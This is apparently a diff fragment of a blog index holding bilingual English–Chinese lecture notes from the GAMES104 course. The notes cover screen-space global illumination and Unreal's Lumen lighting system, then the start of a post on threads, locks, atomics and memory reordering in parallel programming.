    Problems in VXGI

    VXGI 中的问题

    Incorrect Occlusion (opacity)

    遮挡不正确(不透明)

    • naively combine the opacity with alpha blending.

      天真地将不透明与阿尔法混合结合起来。

    Light Leaking

    漏光

    • when occlusion wall is much smaller than voxel size

      当闭塞壁远小于体素尺寸时

    webp

    Screen Space Global Illumination (SSGI)

    屏幕空间全局照明(SSGI)

    General Idea

    总体思路

    • Reuse screen-space data

      重复使用屏幕空间数据

    webp

    Radiance Sampling in Screen Space

    屏幕空间中的辐射采样

    For each fragment:

    对于每个片段:

    • Step 1: compute many reflection rays

      步骤 1:计算许多反射光线

    • Step 2: march along ray direction (in depth gbuffer)

      步骤 2:沿射线方向行进(在深度 gbuffer 中)

    • Step 3: use color of hit pointas indirect lighting

      步骤 3:使用目标点的颜色作为间接照明

    webp

    Linear Raymarching

    线性射线推进

    • General Steps

      一般步骤

      • Step forward at a fixed step size

        以固定步长向前迈进

      • At each step, check depth value

        每一步,检查深度值

    • Features

      特征

      • Fast

        快速

      • May skip thin objects

        可能跳过薄物体

    webp

    Hierachical Tracing

    层次追踪

    • Generate min-depth mipmap (pyramid)

      生成最小深度 mipmap(金字塔)

    • Stackless ray walk of min-depth mipmap

      最小深度 mipmap 的无堆叠射线行走

    webp

    1
    2
    3
    4
    5
    6
    7
    level = 0;
    while(level > -1)
    {
    stepcurrentcell();
    if (above z plane) level++;
    if (below z plane) level--;
    }

    webp

    Ray Reuse among Neighbor Pixels

    相邻像素间的光线复用

    • Store hitpoint data

      存储命中点数据

    • Assume visibility is the same between neighbors

      假设邻居之间的能见度相同

    • Regard ray to neighbor’s hitpointas valid

      将邻居的 hitpoint 视为有效

    webp

    Cone Tracing with Mipmap Filtering

    基于 Mipmap 滤波的圆锥跟踪

    Estimate footprintof a coneat hit point

    估算锥形撞击点的足迹

    • roughness

      粗糙度

    • distance to hit

      击中距离

    Sample the color mipmap

    对彩色 mipmap 进行采样

    • mip level is determined by footprint

      mip 级别由足迹决定

    Pre-filter color mipmap (pyramid)

    预过滤彩色 mipmap(金字塔)

    webp

    SSGI Summary

    SSGI 总结

    • Pros:

      优点:

      • Fast for glossy and specular reflections

        快速实现光泽和镜面反射

      • Good quality

        质量好

      • No occlusion issues

        无遮挡问题

    • Cons:

      缺点:

      • Missing information outside screen

        屏幕外信息缺失

      • Affects of incorrect visibility of neighbor ray reuse

        相邻射线重用可见性不正确的影响

    webp

    Unique Advantages of SSGI

    SSGI 的独特优势

    • Easy to handle close contact shadow

      易于处理近距离接触阴影

    • Precise hit point calculation

      精确的命中点计算

    • Decouple from scene complexity

      与场景复杂性解耦

    • Handle dynamic objects

      处理动态对象

    Lumen

    ​Lumen 是一个实时全局光照系统,由 Epic Games 开发,用于其虚幻引擎(Unreal Engine)。它旨在提高游戏和其他实时应用中的光照效果的真实感。Lumen 可以动态地计算光线的传播、反射和折射,无需事先烘焙光照贴图,因此能更好地适应场景的变化,比如光线源的移动或物体的位置改变。它通过实时计算来模拟复杂的光照效果,比如间接光和反射,使得视觉效果更加自然和沉浸。

    Ray Traces are slow

    光线追踪很慢

    • Can only afford 1/2 ray per pixel

      每像素只能提供 1/2 射线

    • But quality GI needs hundreds

      但高质量的 GI 需要数百个

    webp

    Sampling is hard

    取样很困难

    Previous real-time work: Irradiance Fields

    以前的实时工作:辐照度场

    • Problems:

      问题:

      • Leaking and over-occlusion

        渗漏和过度堵塞

      • Probe placement

        探头放置

      • Slow lighting update

        照明更新缓慢

      • Distinctive flat look

        独特的扁平外观

    Previous real-time work: Screen Space Denoiser

    以前的实时工作:屏幕空间去噪器

    • Problems:

      问题:

      • Too noisy in many difficult indoor cases

        在许多困难的室内环境中噪音太大

      • Noise is not constant.

        噪音不是恒定的。

    webp

    Low-res filtered scene space probes lit full pixels

    低分辨率滤波场景空间探测器照亮了全像素

    webp

    Phase 1 : Fast Ray Trace in Any Hardware

    阶段 1:任何硬件中的快速光线追踪

    Signed Distance Field (SDF)

    签名距离字段(SDF)

    What is SDF

    • The distance to the nearest surface at every point

      每个点到最近曲面的距离

    • Inside regions store negative distance (signed)

      内部区域存储负距离(带符号)

    • Distance = 0 is the surface

      距离 = 0 是曲面

    webp

    Per-Mesh SDF

    每网格 SDF

    Store SDF of the whole scene is expensive

    整个场景的商店 SDF 都很贵

    Generated for each mesh

    为每个网格生成

    • Resolution based on mesh size

      基于网格大小的分辨率

    • Embree point query

      Embree 积分查询

    • Trace rays and count triangle back faces for sign ( more than 25% hit back is negative)

      追踪光线并计算标志的三角形背面(超过 25% 的回射为负)

    webp

    • Original Mesh

      原始网格

    • Resolution is too low, important features are lost

      分辨率太低,重要功能丢失

    • Resolution has been increased, important features represented

      分辨率已提高,重要功能已呈现

    SDF for Thin meshes

    用于薄网格的 SDF

    • Half voxel expand to fix leaking

      半体素扩展以修复泄漏

    • Lost contact shadows due to surface bias

      表面偏移导致接触阴影丢失

      • Over occlusion better than leaking

        过度堵塞比泄漏好

    webp

    Ray Tracing with SDF

    使用 SDF 进行光线追踪

    Ray intersection skips through empty space based on distance to surface

    射线交点根据到曲面的距离跳过空白空间

    • Safe and fast

      安全快捷

    • Each time at $p$, just travel $SDF(p)$ distance

      每次在 $p$ 时,只需行进 $SDF(p)$ 距离

    webp

    Cone Tracing with SDF (ie. Soft Shadow)

    使用 SDF 进行圆锥体跟踪(即软阴影)

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    Divides the Mesh SDF into bricks

    将网格 SDF 划分为块

    • Define a max_encode_distance

      定义 max_encode 距离

      • Invalid if ∀ sdf(brick) > max_encode_distance

        如果 ∀sdf(brick) > max_encode_distance,则无效

    • IndirectionTable store the index of each brick

      IndirectionTable 存储每块砖的索引

    webp

    webp

    Mesh SDF LoD

    网状 SDF LoD

    • Every frame GPU gathers requests

      每一帧 GPU 都会收集请求

    • CPU download requests and streams pages in/out

      CPU 下载请求和流式页面输入/输出

    • 3mips are generated

      生成 3 个 MIP

      • Lowest resolution always loaded and the other 2streamed

        始终加载最低分辨率,其他 2 个分辨率为流式传输

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    webp

    Ray Tracing Cost in Real Scene

    真实场景中的光线追踪成本

    webp

    Trace camera rays and visualize the number of steps

    追踪相机光线并可视化步数

    Many Objects along Each Ray

    每条射线上有许多物体

    webp

    Number of hit objects along each ray

    沿每条射线的命中物体数量

    Global SDF

    全球 SDF

    • Global SDF is inaccurate near surface

      全球 SDF 在地表附近不准确

    • Sample object SDFs near start of cone, global SDF for the rest

      在圆锥体起点附近采样对象 SDF,其余部分为全局 SDF

    webp

    Ray Tracing with Global SDF

    使用全局 SDF 进行光线追踪

    Massively reduces tracing cost on overlapping objects

    大幅降低重叠对象的跟踪成本

    webp

    Cache Global SDF around Camera

    在相机周围缓存全局 SDF

    • 4 clipmaps centered around camera

      4 张以相机为中心的剪贴画

    • Clipmaps are scrolled with movement

      Clipmap 随着移动而滚动

    • Distant clipmaps updated less frequently

      远处的 clipmap 更新频率较低

    • Also sparsely stored (~16x memory saving)

      存储也很稀疏(约节省 16 倍内存)

    webp

    Phase 2 : Radiance Injection and Caching

    阶段 2:辐射注入和缓存

    Mesh card –orthogonal camera on 6-Axis Aligned directions

    网格卡——6 轴对齐方向上的正交相机

    1
    2
    3
    4
    5
    6
    class FLumenCard
    {
    FLumenCardOBB LocalOBB;
    FLumenCardOBB WorldOBB;
    uint8 AxisAliqnedDirectionIndex;
    }

    webp

    webp

    Generate Surface Cache

    生成 Surface 缓存

    Two Passes

    两个步骤

    Pass 1:Card capture

    步骤 1:卡捕获

    • Fix texel budget per frame (512 x 512)

      固定每帧的纹理像素预算(512 x 512)

    • Sort by distance to camera and GPU feedback

      按距离相机和 GPU 反馈排序

    • Capture resultion depends on card projection on screen

      捕获结果取决于屏幕上的卡片投影

    webp

    Pass 2:Copy cards to surface cache and compress

    步骤 2:将卡片复制到表面缓存并压缩

    webp

    4096 x 4096 Surface Cache Atlas

    贴图颜色通道纹理压缩缓存大小
    AlbedoRGB8BC716mb
    OpacityR8BC48mb
    DepthR16-32mb
    NormalHemisphere RG8BC416mb
    EmissiveRGB Float16BCGH16mb

    compress from 320mb to 88mb

    从 320mb 压缩到 88mb

    1
    2
    3
    4
    5
    6
    7
    8
    static FLumenSurfaceLayerConfig Configs[(uint32)ELumenSurfaceCacheLayer::MAX]
    {
    {TEXT("Depth"), PF_G16, PF_Unknown, PF_Unknown, FVector(1.af,0.0f,0.0f)},
    {TEXT("Albedo"), PF_R8G8B8A8,PF_BC7, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Opacity"), PF_G8, PF_BC4, PF_R32G32B32A32_UINT, FVector(1.0f,0.0f,0.0f)},
    {TEXT("Normal"), PF_R8G8, PF_BC5, PF_R32G32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Emissive"), PF_BC4, PF_FloatR11G11B10, PF_BC6H, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)}
    };

    View Dependent Per-Object Card Resolution

    查看每对象卡分辨率

    128 x 128 physical pages in a 4096 x 4096 atlas

    4096 x 4096 图集中的 128 x 128 个物理页面

    Card capture res >= 128 x 128

    卡捕获分辨率 >= 128 x 128

    • Split into multiple 128 x 128 physical pages

      拆分为多个 128 x 128 物理页面

    Card capture res < 128 x 128

    卡捕获分辨率 < 128 x 128

    • Sub-allocate from a 128 x 128 physical page

      从 128 x 128 物理页面进行子分配

    webp

    How can we “freeze” lighting on Surface Cache

    我们如何在 Surface Cache 上“冻结”照明

    How to compute lighting on hit?

    如何计算命中时的光照?

    • Is the pixel under the shadow

      像素是否位于阴影之下

    • How can we handle multi-bounce

      我们如何处理多次反弹

    Lighting Cache Pipeline

    照明缓存管道

    webp

    Direct Lighting

    直接照明

    • Divide 128 x 128 page into 8 x 8 tiles

      将 128 x 128 页划分为 8 x 8 个图块

    • Cull lights with 8 x 8 tile

      8 x 8 瓷砖装饰灯

    • Select first 8 lights per tile

      为每块瓷砖选择前 8 盏灯

    • 1bit shadow mask

      1bit 荫罩

    webp

    One tile can be lited by multilights, the result will be accumlated

    一块瓷砖可以被多盏灯照亮,结果会累加

    webp

    Global SDF can’t sample surface cache

    全局 SDF 无法对曲面缓存进行采样

    • no per mesh information, only hit position and normal

      无网格信息,仅命中位置和正常

    Use voxel lighting to sample

    使用体素照明进行采样

    webp

    Voxel Clipmapfor Radiance Caching of the Whole Scene

    体素剪贴画用于整个场景的辐射缓存

    4 level clipmaps of 64x64x64 voxels

    64 x 64 x 64 体素的 4 级剪贴图

    • Radiance per 6 directions per voxel

      每个体素每 6 个方向的辐射

    • Sample and interpolate 3 directions by normal

      通过法线对 3 个方向进行采样和插值

    • Clipmap0 cover 50m^3, voxel size is 0.78m

      Clipmap0 覆盖 50m^3,体素大小为 0.78m

    • Store in 3D texture

      存储在 3D 纹理中

    Clipmapupdate frequency rules

    剪贴图更新频率规则

    Clipmap 0Clipmap 1Clipmap 2Clipmap 3
    Start_Frame0137
    Update_interval2488

    webp

    Build Voxel Faces by Short Ray cast

    通过短光线投射构建体素人脸

    • Trace mesh DF on 6 directions per voxel

      在每个体素的 6 个方向上跟踪网格 DF

    • Hit mesh id and hit distance

      命中网格 id 和命中距离

    • RayStart = VoxelCenter – AxisDir * VoxelRaidus

    • RayEnd = VoxelCenter + AxisDir * VoxelRaidus

    webp

    store hit infro intovisibilty buffer uint32 [Hit distance| Hit object id]

    将命中信息存储到可见性缓冲区 uint32 [命中距离|命中对象 id]

    Filter Most Object Out by 4x4x4 Tiles

    通过 4x4x4 瓷砖过滤掉大部分对象

    webp

    Inject light into clipmap

    将光线注入 clipmap

    • Clear all voxel lighting in entire Clipmap

      清除整个 Clipmap 中的所有体素照明

    • Compact all valid VisBuffer in Clipmap

      压缩 Clipmap 中的所有有效 VisBuffer

    • Sampling FinalLighting from VisBufferand inject lighting

      从 VisBuffer 中采样 FinalLighting 并注入照明

    webp

    Indirect Lighting

    间接照明

    • Place 2 x 2 probes on each tile -each probe cover 4 x 4 texels

      在每个瓷砖上放置 2 x 2 个探头,每个探头覆盖 4 x 4 纹理像素

    • Trace 16 rays from hemisphere per probe

      每个探测器追踪 16 条来自半球的射线

    • Jitter probe placement and ray directions

      抖动探头位置和射线方向

    webp

    • Spatial filtering between probes

      探头之间的空间滤波

    • Convert to TwoBandSH (store in half4)

      转换为 TwoBandSH(存储在 half4)

    webp

    Per-Pixel Indirect Lighting with 4 Probe Interpolation

    采用 4 探头插值的每像素间接照明

    • Integrate on pixel -bilinear interpolation of 4 neighbor probes

      4 个相邻探针的像素双线性插值集成

    webp

    Combine Lighting

    组合照明

    FinalLighting = (DirectLighting + IndirectLighting) * Diffuse_Lambert(Albedo) + Emissive;

    webp

    Ligting Update Strategy

    Ligting 更新策略

    Fix budget

    固定预算

    • 1024 x 1024 texels for direct lighting

      1024 x 1024 像素用于直接照明

    • 512 x 512 texels for indirect lighting

      512 x 512 像素用于间接照明

    • Select pages to update based on Priority = LastUsed-LastUpdated

      根据优先级 = 上次使用上次更新选择要更新的页面

    Priority queue using bucket sort

    使用桶排序的优先级队列

    • 128 buckets

      128 桶

    • Update buckets with priority until reaching budget

      优先更新存储桶,直到达到预算

    Phase 3: Build a lot of Probes with Different Kinds

    第三阶段:构建大量不同类型的探测器

    Screen Space Probe

    屏幕空间探测器

    Octahedral atlas with border

    带边框的八面体图集

    • Typically 8 x 8 per probe

      通常每个探头 8 x 8

    • Uniformly distributed world space directions

      均匀分布的世界空间方向

    • Neighbors have matching directions

      邻居有匹配的方向

    Radiance and HitDistance in 2d atlas

    二维图谱中的辐射度和 HitDistance

    webp

    Octahedron mapping

    八面体映射

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    float2 unitVectorTo0ctahedron(float3 N)
    {
    N.xy /= dot(1, abs(N));
    if(N.z<= 0)
    {
    x_factor = N.x >= 0 ? 1.0 : -1.0;
    y_factor = N.y >= 0 ? 1.0 : -1.0;
    N.xy = (1 - abs(N.yx)) * float2(x_factor, y_factor);
    return float2(N.xy);
    }

    Screen Probe Placement

    屏幕探头放置

    • Adaptive placement with Hierarchical Refinement

      具有层次细化的自适应布局

    • Iteratively place where interpolation fails

      迭代地放置插值失败的位置

    webp

    Plane distance weighting of Probe Interpolation

    探针插值的平面距离加权

    webp

    Detect Non-Interpolatable Cases

    检测不可插值的案例

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    float4 PlaneDistances;
    PlaneDistances.x = abs(dot(float4(Position00, -1), ScenePlane));
    PlaneDistances.y = abs(dot(float4(Position10, -1), ScenePlane));
    PlaneDistances.z = abs(dot(float4(Position01, -1), ScenePlane));
    PlaneDistances.w = abs(dot(float4(Position11, -1), ScenePlane));

    float4 RelativeDepthDifference = PlaneDistances / SceneDepth;

    Depthweights = CornerDepths > 0 ? exp2(-10000. 0f * (RelativeDepthDifference * RelativeDepthDifference)) : 0;

    InterpolationWeights = float4(
    (1-BilinearWeights.y) * (1-BilinearWeights.x),
    (1-BilinearWeights.y) * BilinearWeights.x,
    BilinearWeights.y * (1 - BilinearWeights.x),
    BilinearWeights.y * BilinearWeights.x);
    InterpolationWeights *= DepthWeights;

    float Epsilon = .01f;
    ScreenProbeSample.Weights /= max(dot(ScreenProbeSample.Weights, 1), Epsilon);
    float LightingIsValid = (dot(ScreenProbeSample.Weights, .1) < 1.0f - Epsilon) ? 0.0f : 1.0f.

    Screen Probe Atlas

    屏幕探针图谱

    • Atlas have upper limit for real-time

      Atlas 有实时上限

    • Place adaptive probes at the bottom of the atlas

      将自适应探头放置在图谱底部

    webp

    webp

    Screen Probe Jitter

    屏幕探头抖动

    • Place probedirectly on pixels

      将探测器直接放置在像素上

    • Temporally jitter placement and direction

      时间抖动位置和方向

    • Use Hammersley points in [0, 15]

      在 [0,15] 中使用 Hammersley 积分

    webp

    Importance Sampling

    重要性采样

    But too much noise at ½ ray per pixel

    但每像素 ½ 射线的噪声太大

    webp

    Better sampling -importance sample incoming lighting and BRDF

    更好的采样-重要样本输入照明和 BRDF

    webp

    $\lim_{N\to\infty}\frac1N\sum_{k=1}^N\frac{L_i(l)f_s(l\to v)\cos(\theta l)}{P_k}$

    We would like to distribute rays proportional to the integrand

    我们希望光线的分布与被积函数成正比

    How can we estimate these?

    我们如何估算这些?

    Approximate Radiance Importance from Last Frame Probes

    最后一帧探测器的近似辐射重要性

    webp

    Incoming Radiance:

    入射辐射:

    • Reproject to last frame and average the four neighboring Screen Probes Radiance

      重新投影到最后一帧,并对四个相邻的屏幕探头辐射进行平均

    • No need to do an expensive search, as rays already indexed in octahedral atlas

      无需进行昂贵的搜索,因为光线已经在八面体图集中索引

    • Fallback to World Space Probe Radiance ifneighboring probes are occluded

      如果相邻探测器被遮挡,则回退到世界空间探测器辐射

    Accumulate Normal Distribution Nearby

    附近累积正态分布

    webp

    BRDF:

    • For a probe that’s placed on a flat wall, about half of its spherehaving a zero BRDF

      对于放置在平坦墙壁上的探头,其球体的大约一半具有零 BRDF

    • Accumulate from pixels that will use this Screen Probe

      从将使用此屏幕探测器的像素中累积

    Nearby Normal Accumulation

    附近正常堆积

    • Gathter 64 neighbor pixels around current probe’s pixel in a 32 x 32 pixelrange

      在 32 x 32 像素范围内收集当前探头像素周围的 64 个相邻像素

    • Acceptpixel if its depth weight > 0.1

      如果像素的深度权重 > 0.1,则接受像素

    • Accumulate these pixels’ world normal into SH

      将这些像素的世界法线累积到 SH 中

    webp

    Structured Importance Sampling

    结构化重要性抽样

    • Assigns a small number of samples to hierarchically structured areas of the Probability Density Function (PDF)

      将少量样本分配给概率密度函数的分层结构区域(PDF)

    • Achieves good global stratification

      实现良好的全球分层

    • Sample placement requires offline algorithm

      样本放置需要离线算法

    webp

    Maps perfectly to Octahedral mip quadtree!

    完美映射到八面体 mip 四叉树!

    webp

    Fix Budget Importance Sampling based on Lighting and BRDF

    基于照明和 BRDF 的固定预算重要性抽样

    • Start with uniformly distributed probe ray directions

      从均匀分布的探头射线方向开始

    • Fixed probe tracing ray count = 64

      固定探头跟踪射线计数 = 64

    • Calculate BRDF PDF * Lighting PDF for each Octahedral texel

      计算每个八面体纹理的 BRDF * Lighting PDF

    • Sort rays by PDF from low to high

      按 PDF 从低到高对光线进行排序

    • For every 3 rays with PDF below cull threshold, supersample the matching highest PDF ray

      对于 PDF 低于剔除阈值的每 3 条射线,对匹配的最高 PDF 射线进行超采样

    webp

    webp

    webp

    webp

    ​右边是使用 BRDF 和 Lighting PDF 的效果。

    Denoising and Spatial Probe Filtering

    去噪和空间探测滤波

    Denoise: Spatial filtering for Probe

    去噪:探头的空间滤波

    Large spatial filter for cheap

    大空间滤波器,成本低

    • Each probe cover 16 x 16 pixels, 3 x 3 filtering kernelin probe space equals 48 x 48 inscreen space

      每个探头覆盖 16 x 16 像素,探头空间中的 3 x 3 滤波核等于屏幕空间中的 48 x 48

    Can ignore normal differences between spatial neighbors

    可以忽略空间邻居之间的正常差异

    • Only depth weighting

      仅深度加权

    webp

    1
    2
    3
    4
    5
    6
    float GetFilterPositionWeight(floatProbeDepth, float sceneDepth)
    {
    float DepthDifference = abs(ProbeDepth - SceneDepth);
    float RelativeDepthDifference = DepthDifference / sceneDepth;
    return ProbeDepth >= 0 ? exp2(-spatialFilterPositionweightscale * (RelativeDepthDifference * RelativeDepthDifference)) : 0;
    }

    Denoise: Gather Radiance from neighbors

    降噪:从邻居那里收集辐射

    Gather radiance from matching Octahedral cell in neighbor probes

    在相邻探针中收集匹配八面体细胞的辐射

    Error weighting:

    错误加权:

    • Angle error from reprojected neighbor ray hits (less than 10 degree)

      重新投影的相邻光线照射的角度误差(小于 10 度)

    • Filters distant lighting, preserves local shadowing

      过滤远距离照明,保留局部阴影

    webp

    webp

    Clamp Distance Mismatching

    夹紧距离不匹配

    Angle error biases toward distant light = leaking

    角度误差偏向远光 = 泄漏

    • Distant light has no parallax and never gets rejected

      远光没有视差,永远不会被拒绝

    Solution: clamp neighbor hit distance to our own before reprojection

    解决方案:在重新投影之前,将邻居的击中距离限制在我们自己的距离

    webp

    webp

    World Space Probes and Ray Connecting

    世界空间探测器和射线连接

    World Space Radiance Cache

    世界空间辐射缓存

    Problem: distant lighting

    问题:远距离照明

    • Noise from small bright feature increases with distance

      小亮特征的噪声随着距离的增加而增加

    • Long incoherent traces are slow

      长的非相干痕迹很慢

    • Distant lighting is changing slowly -opportunity to cache

      远距离照明变化缓慢——缓存机会

    • Redundant operations for nearby Screen Probes

      附近屏幕探头的冗余操作

    Solution: separate sampling for distant Radiance

    解决方案:对远距离辐射进行单独采样

    • World space Radiance Caching for distant lighting

      用于远距离照明的世界空间辐射缓存

    • Stable error since world space -easy to hide

      自世界空间以来的稳定错误-易于隐藏

    webp

    Placement

    • 4 level clipmaps around camera

      相机周围的 4 级 clipmap

    • default resolution is 48^3

      默认分辨率为 48^3

    • clipmap0size is 50m^3

      clipmap0 的大小为 50m^3

    Radiance

    • 32 x 32 atlas a per probe

      每 32 x 32 的区域放置一个探头

    webp

    Connecting rays

    连接射线

    • How to connect Screen Probe ray and World Probe ray

      如何连接 Screen Probe ray 和 World Probe ray

    webp

    • World Probe ray must skip the interpolation footprint

      World Probe 射线必须跳过插值足迹

    webp

    • Screen Probe ray must cover interpolation footprint + skipped distance

      屏幕探测光线必须覆盖插值足迹 + 跳过距离

    webp

    • Problem: leaking!

      问题:泄漏!

    • World probe radiance should have been occluded

      世界探测器的辐射应该被遮挡了

      • But wasn’t due to incorrect parallax

        但不是因为视差不正确

    webp

    • Solution: simple sphere parallax

      解决方案:简单球面视差

    • Reproject Screen Probe ray intersection with World Probe sphere

      重新投影屏幕探头射线与 World Probe 球体的交点

    webp

    Placement and caching

    放置和缓存

    • Mark any position that we will interpolate from later in clipmap indirections

      标记我们稍后将在 clipmap 间接中插入的任何位置

    • For each marked world probe:

      对于每个标记的世界探测器:

      • Reuse traces from last frame, or allocate new probe index

        重用上一帧的跟踪,或分配新的探测索引

      • Re-trace a subset of cache hits to propagate lighting changes

        重新跟踪缓存命中的子集以传播照明变化

    webp

    Place Peobes → Reuse existing probe traces → Generate rays → Trace → Probe space filtering

    放置探针 → 重复使用现有的探针痕迹 → 生成射线 → 痕迹 → 探针空间过滤

    • Without World Space Probes

      没有世界空间探针

    webp

    • Screen Radiance Cache for the first 2meters

      前 2 米的屏幕辐射缓存

    • World Radiance Cache for any lighting further than that.

      World Radiance Cache 适用于任何超出此范围的照明。

    webp

    Phase 4 : Shading Full Pixels with Screen Space Probes

    阶段 4:使用屏幕空间探测器对全像素进行着色

    Convert Probe Radiance to 3rd order Spherical Harmonic:

    将探头辐射转换为三阶球面谐波:

    • SH is calculated per Screen Probe

      SH 按屏幕探头计算

    • Full res pixels load SH coherently

      全分辨率像素相干加载 SH

    • SH Diffuse integration cheap and high quality

      SH Diffuse 集成价格低廉,质量上乘

    webp

    importance sample the BRDF to get ray directions, and then sample the Radiance Cache.

    对 BRDF 进行重要性采样以获取光线方向,然后对辐射缓存进行采样。

    Final integration with SH

    与 SH 的最终整合

    webp

    Overall, Performance and Result

    总体、性能和结果

    Speed of Different Tracing Methods

    不同追踪方法的速度

    webp

    Red–Screen Space Trace 红色-屏幕空间轨迹

    fail to hit 未能命中↓

    Green–Mesh SDF Trace 绿色–网格 SDF 轨迹

    fail to hit 未能命中↓

    Blue–Global SDF Trace 蓝色–全球 SDF 跟踪

    webp

    webp

    webp

    webp

    ​右边是打开 SSGI 的效果。

    Performance

    性能

    Playstation 5

    1080p internal resolution

    1080p 内部分辨率

    Temporal Super Resolution to 4k

    时间超分辨率 4k

    webp

    webp

    webp

    webp

    webp

    webp

    Conclusion

    结论

    Complexity of Real Rendering

    webp

    $$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$$

    ​这个方程可以解决所有的渲染问题,但是在实际应用中需要根据性能进行取舍。

    References

    参考

    Monte Carlo Integration

    GI

    Hardware Ray Tracing

    Signed Distance Field

    ]]>
    @@ -904,7 +904,7 @@ /posts/GAMES104-Data-Oriented%20Programming%20and%20Job%20System/ - 资源

    课程

    第二十节:现代游戏引擎架构:面向数据编程与任务系统

    Code Execution Is Not As Simple As It Looks

    代码执行并不像看起来那么简单

    Code is executed on top of specific hardware and operating system

    代码在特定硬件和操作系统上执行

    • Hardware and OS must be considered if we want to write a high performance program

      如果我们想编写高性能程序,就必须考虑硬件和操作系统

    webp

    Basics of Parallel Programming

    并行程序设计基础

    Ceiling of Moore’s Law and Multi-Cores

    摩尔定律的上限与多核

    • The number of transistors in a dense integrated circuit (IC) doubles about every two years

      密集集成电路(IC)中的晶体管数量大约每两年翻一番

    • In these years, chip densities are no longerdoubling every two years

      这些年来,芯片密度不再每两年翻一番

    • Multi-coreprocessorbecomes the new industry trend

      多核处理器成为新的行业趋势

    webp

    ​处理器的精度和频率的提升达到了一个瓶颈,添加更多核心成为提升处理器性能的一个趋势。

    Process and Thread

    进程和线程

    Process

    进程

    • The instance of an application (or program)

      应用程序(或程序)的实例

    • Has its own individual region of memory

      有自己的内存空间

    Thread

    线程

    • Preemptive multitasking

      先发制人的多任务处理

    • The smallest unit of task that can be scheduled by OS

      操作系统可以调度的最小任务单元

    • Must reside in a process

      必须驻留在进程中

    • Threads in the same process share the same region of memory

      同一进程中的线程共享同一内存区域(处理不好容易出 bug)

    webp

    Types of Multitasking

    多任务处理的类型

    webp

    Preemptive Multitasking

    先发制人的多任务处理

    • Currently executing task can be interrupted at a time decided by the scheduler

      当前正在执行的任务可以在调度程序决定的时间中断

    • Scheduler determines which task to be executed next

      调度器确定下一个要执行的任务

    • Applied in most operating systems

      适用于大多数操作系统

    webp

    Non-preemptive Multitasking

    非抢占式多任务处理

    • Tasks must be explicitly programmed to yield control

      任务必须明确编程以实现控制

    • Tasksmust cooperate for the scheduling scheme to work

      任务必须配合调度方案才能发挥作用

    • Currently many real-time operating systems (RTOS) also support this kind of scheduling

      目前,许多实时操作系统(RTOS)也支持这种调度

    Thread Context Switch

    线程上下文切换

    Store the state of a thread and resume the execution at a later point

    存储线程的状态,并在稍后恢复执行

    • State including registers, stack and other OS required data

      状态,包括寄存器、堆栈和其他操作系统所需的数据

    • Thread context switch implies extra user-kernel mode switch

      线程上下文切换意味着额外的用户内核模式切换

    • Cache invalidation after context switch has even more cost

      上下文切换后缓存失效的成本更高

    webp

    Cache invalidation may takes 10,000~1,000,000 cycles

    缓存失效可能需要 10000~1000000 个周期

    Parallel Problems in Parallel Computing

    并行计算中的并行问题

    Embarrassingly Parallel Problem (or Perfectly Parallel)

    易并行计算问题(或完全平行问题)

    • Little or no dependency or need for communication between parallel tasks

      并行任务之间很少或不需要通信

    webp

    Monte Carlo algorithm is a typical example of embarrassingly parallel

    蒙特卡洛算法是易并行计算问题的典型例子(使用多线程计算蒙特卡洛积分)

    Non-embarrassingly Parallel Problem

    非尴尬的平行问题

    • Communication is needed between parallel tasks

      并行任务之间需要通信

    webp

    Data Race in Parallel Programming

    并行编程中的数据竞争

    Multiple threads in a single process access the same memory location concurrently

    单个进程中的多个线程同时访问同一内存位置

    • Atleast one of the accesses is for writing

      至少有一个入口是用于写作的

    while(job_count < 100) {
    doSomething();
    job_count++;
    }
    • Read job_count

      读取 job_count

    • Compute job_count +1

      计算任务计数 +1

    • Write new job_count

      任务计数

    webp

    Blocking Algorithm -Locking Primitives

    阻塞算法-上锁

    Lock

    • Only one thread can acquire the lock at a time

      一次只能有一个线程获取锁

    • Make a critical sectionfor shared resource access

      创建共享资源访问的关键部分

    webp

    Only one thread can do this part of code in the same time

    只有一个线程可以同时执行这部分代码

    Other Issues with Locks

    锁的其他问题

    • Thread suspending and resuming will bring performance overhead

      线程挂起和恢复将带来性能开销

    • Suspending threads never get resumed if the thread that acquires the lock exits abnormally

      如果获取锁的线程异常退出,则挂起的线程永远不会恢复

    • Priority Inversion

      优先级反转

      • A higher priority task attempts to acquire the lock that is already acquired by a lower priority task

        较高优先级的任务试图获取较低优先级任务已经获取的锁

    webp

    Atomic Operation : Lock-free Programming

    原子操作:无锁编程

    Atomic Loads and Stores

    原子负载和存储

    • Load: Load data from shared memory to either a register or thread-specific memory

      加载:将数据从共享内存加载到寄存器或线程特定内存

    • Store: Move data into shared memory

      存储:将数据移动到共享内存中

    Atomic Read-Modify-Write (RMW)

    原子读修改写(RMW)

    • Test and Set: Set 1 to shared memory and return the previous value

      测试和设置:将 1 设置为共享内存并返回上一个值

    • CompareandSwap (CAS): Update the data in shared memory if it equals an expected value

      比较和交换(CAS):如果共享内存中的数据等于预期值,则更新该数据

    • Fetch and Add: Add a value to the data in shared memory and return the previous value

      提取并添加:向共享内存中的数据添加一个值,并返回上一个值

    webp

    C++11 和 C++20 提供了原子操作的语句。

    Lock Free vs. Wait Free

    webp

    • wait-free:不管 OS 如何调度线程,每个线程始终在做有用的事情。

    • lock-free:不管 OS 如何调度线程,至少有一个线程在做有用的事情。

    Compiler Reordering Optimizations

    编译器重新排序优化

    webp

    ​编译器将高级语言汇编成汇编语言时,有可能进行优化操作修改代码的执行顺序,这在单线程中不会有变化,但在多线程中可能出现奇怪情况。

    Problem of Memory Reordering

    内存重新排序问题

    • Compilers and CPUs often modify the execution order of instructions to optimize performance

      编译器和 CPU 经常修改指令的执行顺序以优化性能

    • It’s the hard part of parallel programming

      这是并行编程的难点

    webp

    assert 是 C/C++ 中的一个宏,用于在运行时检查一个条件是否为真。如果条件不满足,则运行时将终止程序的执行并输出一条错误信息。

    ​如果 Thread 1 进行了编译器优化,则 Thread 2 可能不会在 assert(a==2); 处抛出错误。

